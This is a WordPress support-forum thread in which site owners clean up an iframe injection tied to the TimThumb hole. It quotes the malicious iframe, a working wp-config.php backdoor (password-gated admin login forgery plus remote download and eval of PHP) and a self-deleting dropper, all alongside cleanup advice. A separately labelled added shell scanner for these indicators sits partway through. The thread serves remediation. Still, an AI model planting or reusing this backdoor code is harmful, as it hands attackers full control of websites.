Support » Everything else WordPress » [TimThumb Vulnerability] iframe hack

  • Hi,

    Does somebody have more info about

    <iframe id="iframe" style="width: 1px; height: 1px;" src=" http://counter-wordpress.com/frame.php">
    <html>
    <head>
    </head>
    <body>
    </body>
    </html>
    </iframe>

    Somebody hacked all my WP sites…

    THX to all who will help.

Viewing 15 replies - 16 through 30 (of 59 total)
  • Moderator Ipstenu (Mika Epstein)

    (@ipstenu)

    🏳️‍🌈 Halfelf Rogue & Plugin Review Team Rep

    Check at http://sitecheck.sucuri.net/scanner/. It should tell you.

    Thank you so much!

    Just found this on one of my sites. It looks bad. Anything special I should do? It was in the wp-config file:

    // Backdoor found in wp-config.php: every branch is keyed on the same hard-coded md5 secret.
    if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
        if ($_GET['pass'] == 'ea5d2f1c4608232e07d3aa3d998e5135'){
            // 'login': forges an authenticated session as 'admin' without any password.
            if ($_GET['pingnow']== 'login'){
                $user_login = 'admin';
                $user = get_userdatabylogin($user_login);
                $user_id = $user->ID;
                wp_set_current_user($user_id, $user_login);
                wp_set_auth_cookie($user_id);
                do_action('wp_login', $user_login);
            }
            // 'exec': downloads a remote file to a random .php name and redirects the browser to it.
            if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
                $ch = curl_init($_GET['file']);
                $fnm = md5(rand(0,100)).'.php';
                $fp = fopen($fnm, "w");
                curl_setopt($ch, CURLOPT_FILE, $fp);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_TIMEOUT, 5);
                curl_exec($ch);
                curl_close($ch);
                fclose($fp);
                echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
            }
            // 'eval': fetches remote PHP source and runs it with eval().
            if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
                $ch = curl_init($_GET['file']);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_TIMEOUT, 5);
                $re = curl_exec($ch);
                curl_close($ch);
                eval($re);
            }
        }
    }
    Moderator Ipstenu (Mika Epstein)

    (@ipstenu)

    🏳️‍🌈 Halfelf Rogue & Plugin Review Team Rep

    Same advice as before.

    http://wordpress.org/support/topic/iframe-hack-3?replies=18#post-2290168

    You need to rip that code out, ALL of it, change your passwords and clean your site.

    Ipstenu, you are a HUGE help. Thanks so much!

    Hi,

    I hope that I got rid of that s…

    1 step – install fresh wp and template
    2 change all passwords

    check
    wp-config

    and after that I found the following:
    /wp-content/upd.php

    <?php
    // Dropper found as /wp-content/upd.php: derives the WordPress root from its own path...
    $file = __FILE__;
    $pos = strpos($file,'wp-content');
    $dir = substr($file,0,$pos);
    // ...rewrites one domain to another inside the site's index.php...
    $index = file_get_contents($dir.'index.php');
    $index = str_replace('superpuperdomain.com','superpuperdomain2.com',$index);
    $f = fopen($dir.'index.php',"w");
    fputs($f,$index);
    fclose($f);
    // ...and deletes itself afterwards.
    unlink($file);
    ?>

    and
    /wp-content/2b64c2f19d868305aa8bbc2d72902cc5.php

    Because of that you need to check wp-content. Delete those files.

    For now all is OK.

    Good luck guys… 😉

    Look for an old jquery.js in your template – delete the old one or upgrade; it looks like sometimes there is also something related to this iframe hack in there.

    Moderator Ipstenu (Mika Epstein)

    (@ipstenu)

    🏳️‍🌈 Halfelf Rogue & Plugin Review Team Rep

    1 step – install fresh wp and template

    Instead, DELETE WP and then upload. It’s the only way to scrub out ALL the files. Then you only have to manually check .htaccess and wp-config.php (and if you’ve uploaded any non-images I suppose….)

    Delete it all EXCEPT for:
    wp-config.php
    .htaccess
    /wp-content/uploads

    And even then you have to scan those two files AND look for any .php files in /wp-content/uploads/

    I wish it was easier 🙁
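    Ipstenu's post above lists what survives a delete-and-reupload (wp-config.php, .htaccess and /wp-content/uploads), and the earlier post points at a doctored jquery.js in the theme. The following is an added example, not code from this thread or from WordPress: a POSIX shell check for those leftovers, using only the indicator strings quoted in this thread; the site tree it scans is a constructed fixture and the function names are my own.

```shell
#!/bin/sh
# Added example (not from the thread or WordPress): scan what survives a delete-and-
# reupload. Indicator strings are the ones quoted in this thread; the fixture is constructed.

# scan_wp_remnants DIR: print findings; status 1 if anything suspicious, 0 if clean.
scan_wp_remnants() {
    site="$1"; found=0
    # 1. The two kept files must not carry the quoted backdoor/iframe markers (-F = literal).
    for f in "$site/wp-config.php" "$site/.htaccess"; do
        [ -f "$f" ] || continue
        if grep -nF -e 'pingnow' -e 'counter-wordpress.com' -e 'superpuperdomain' \
                    -e 'eval($re)' -e 'curl_init($_GET' "$f"; then
            echo "SUSPICIOUS: $f"; found=1
        fi
    done
    # 2. Uploads should hold media only; any PHP there was dropped by someone.
    for f in $(find "$site/wp-content/uploads" -type f \( -name '*.php' -o -name '*.phtml' \) 2>/dev/null); do
        echo "SUSPICIOUS: PHP file in uploads: $f"; found=1
    done
    # 3. The iframe is written by JS, so theme scripts naming the counter domain are suspect.
    for f in $(find "$site/wp-content/themes" -type f -name '*.js' 2>/dev/null); do
        if grep -q 'counter-wordpress' "$f"; then echo "SUSPICIOUS: theme JS: $f"; found=1; fi
    done
    return $found
}

# make_fixture infected|clean: build a throwaway site tree (constructed, for the demo only).
make_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-content/uploads/2011" "$d/wp-content/themes/t"
    printf '<?php define("DB_NAME", "wp");\n' > "$d/wp-config.php"
    printf 'RewriteEngine On\n' > "$d/.htaccess"
    printf 'jQuery(function(){});\n' > "$d/wp-content/themes/t/jquery.js"
    if [ "$1" = infected ]; then
        printf "if (isset(\$_GET['pingnow'])) { eval(\$re); }\n" >> "$d/wp-config.php"
        printf '<?php /* any PHP under uploads is suspect */\n' > "$d/wp-content/uploads/2011/x.php"
        printf 'document.write("<iframe src=http://counter-wordpress.com/frame.php>");\n' \
            > "$d/wp-content/themes/t/jquery.js"
    fi
    echo "$d"
}

# Demo: the infected tree is flagged, the clean one passes.
scan_wp_remnants "$(make_fixture infected)" || echo "infected tree flagged (expected)"
scan_wp_remnants "$(make_fixture clean)" && echo "clean tree passed (expected)"
```

Run it against the real document root after the re-upload; a clean result only covers the files the thread names, not the database or the server itself.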

    This may be a dumb question, but I can see counter-wordpress loading on my site. However, when I right click on the page to view source or try to view it in firebug, I can’t find an iframe or “counter” in the source code. Where is it, so I can know if it’s gone?

    Because it’s loaded by a JS file… Clever way to hide this kind of thing ….

    My WP installation is OK now. I didn’t delete and reinstall, but I basically did a byte-by-byte comparison of the files (with one of my backups, and the files from 3.2.1).

    But anyway, in my case, the goal was to analyse what they did ….

    The best way to be secure, is obviously to delete and reinstall ….

    (Sorry for my English this morning, still no coffee in the system …)

    I wish it was easier 🙁

    Me too, I have been battling this iframe for the past week. I deleted the entire WP install and reinstalled.

    First I found the iframe in the theme and after the reinstall, it’s in the wp-admin area…not good.

    I’m thinking the injection might be in the DB because how else can it contaminate my installation AND not be purged when I deleted all the files?

    I’m going to have to do a complete reinstallation with a new DB and see how it goes.

    @jorge,

    Was your db changed in wp-config.php? Because ours was and I since have changed the password on it and removed the iframe and been monitoring the site to see if it’s coming back. I’m really hoping the database hasn’t been affected. Let me know what you find.

    Moderator Ipstenu (Mika Epstein)

    (@ipstenu)

    🏳️‍🌈 Halfelf Rogue & Plugin Review Team Rep

    Did you delete the files AND change your password AND scan your wp-config.php and .htaccess for possible violations?

    Did you remove EVERYTHING in wp-content (except for the /uploads/ folder)?

    Did you change all your passwords?

    Did you delete the files AND change your password AND scan your wp-config.php and .htaccess for possible violations?

    Did you remove EVERYTHING in wp-content (except for the /uploads/ folder)?

    Did you change all your passwords?

    Yes, just finished another install with a fresh database.

    Went to the wp-admin area, and nothing. I went to the Manage Themes page and bam, it’s there.

    I’m using Chrome – I right click and click on “Inspect Element” – the iframe is there.

    <iframe id="iframe" style="width: 1px; height: 1px; " src="http://counter-wordpress.com/frame.php"></iframe>

    View source shows nothing but that’s a given. This is driving me bonkers.

    EDIT: If the malicious script was in the DB, it would not have been an issue because like I said, it was a fresh install with a new DB with different passwords, etc.

    Moderator Ipstenu (Mika Epstein)

    (@ipstenu)

    🏳️‍🌈 Halfelf Rogue & Plugin Review Team Rep

    Jorge – Call your webhost ASAFP and tell them this, because it looks like your server’s compromised.

    Call your webhost

    That’s a big 10-04

    I’ll keep you all posted.

  • The topic ‘[TimThumb Vulnerability] iframe hack’ is closed to new replies.